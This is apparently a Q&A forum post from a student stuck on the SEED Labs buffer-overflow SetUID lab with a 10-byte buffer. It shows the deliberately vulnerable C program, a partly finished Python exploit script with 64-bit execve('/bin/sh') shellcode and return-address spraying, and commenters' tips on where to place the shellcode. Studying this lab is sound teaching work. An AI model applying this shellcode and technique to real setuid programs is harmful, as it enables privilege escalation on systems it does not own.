# Buffer Overflow Attack when size of Buffer is small on 64bit CPU architecture

Tags: buffer-overflow

I was trying to solve the [Buffer Overflow SetUID lab](https://seedsecuritylabs.org/Labs_20.04/Files/Buffer_Overflow_Setuid/Buffer_Overflow_Setuid.pdf) but stuck in Task 6: L4, to perform the attack when the Buffer Size is small 10.
I understood that since len(shellcode) would be larger the shellcode would not fit in the buffer size, and hence need to put shellcode in a different place. But, unable to understand how to perform the attack.

Here's the source code of the vulnerable program.

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 10
#endif
int bof(char *str)
{
char buffer[BUF_SIZE];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
```

The objective of the task is to create a `badfile` by finding the appropriate values in the `exploit.py`

```
#!/usr/bin/python3
import sys

# Replace the content with the actual shellcode
shellcode= (
  #"\x90\x90\x90\x90"
  #"\x90\x90\x90\x90"
  #"\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"
  "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
  "\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
  "\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
  #"\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"
  #"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  #"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
  #"\xd2\x31\xc0\xb0\x0b\xcd\x80"
).encode('latin-1')

E = 517

# Fill the content with NOP's
content = bytearray(0x90 for i in range(E))

##################################################################
# Put the shellcode somewhere in the payload
#start = 400               # Change this number
content[E - len(shellcode):] = shellcode

# Decide the return address value
# and put it somewhere in the payload

# bufferSize = 200  # assume an approximate value

ret    = 0xffffcf23 + (bufferSize + 200)          # Change this number
#offset = 18              # Change this number

L = 8     # Use 4 for 32-bit address and 8 for 64-bit address

# spray the buffer, to increase the chances of hitting the Return Address
for offset in range(200 // 8):
  content[offset * L:offset * L + L] = (ret).to_bytes(L,byteorder='little')
##################################################################

# Write the content to a file
with open('badfile', 'wb') as f:
  f.write(content)
```

hence need help in understanding what should be added in place of ret variable in the exploit.py ?

I proceeded with using a brute force approach to find the location of the stack, but was unable to figure out how to get the location of the stack, in a complete and correct manner, without resorting to brute force.

Comment: By the time `bof` is called you'll have plenty of space on the stack. The shellcode can be anywhere, it doesn't have to be below the return address. You can simply develop the shellcode normally by putting a jump instruction that jumps around the return address. Don't brute force, draw the state of the stack and design the shellcode properly. Since the stack appears to be executable, I'm assuming none of the anti-exploitation techniques developed in the last 20 years are enabled.

Comment: Keep in mind the shell environment is at the very top of the stack as well. And you can put literally whatever you want there, including multiple NULL bytes with a simple trick (via execle/execve, at least). Try strings -a core | tail -100 on any core file for a very quick and easy visualization of this